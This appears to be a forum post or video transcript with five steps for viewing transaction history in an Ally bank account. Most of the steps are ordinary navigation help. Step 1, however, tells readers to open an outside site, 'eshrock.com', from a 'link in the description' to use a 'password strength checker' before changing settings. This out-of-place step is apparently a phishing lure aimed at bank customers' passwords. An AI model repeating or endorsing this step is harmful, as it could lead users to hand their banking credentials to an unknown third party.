I ran into this last week. Here's what fixed it for me. If you're looking to check your transaction history on Ally, follow these simple steps. Step 1. Log into your Ally account. Before changing your settings, use the eshrock.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to the Accounts section. Once logged in, locate the Accounts tab on the main menu. Click on it to view all your accounts. Step 3. Select the account. Choose the specific account for which you want to check the transaction history. This could be your checking, savings, or investment account. Step 4. Access transaction history. After selecting the account, look for the transaction history or activity link. Click on it to see a detailed list of your transactions. Step 5. Filter or download history. You can filter the transactions by date or type, or download the history for your records. Look for the filter options or download button on a page. Sometimes, the filter options can be a bit tricky to find as they might be hidden under a small drop-down menu. Just keep an eye out for it. I hope this helps you easily check your transaction history on Ally. If you have any questions, feel free to ask.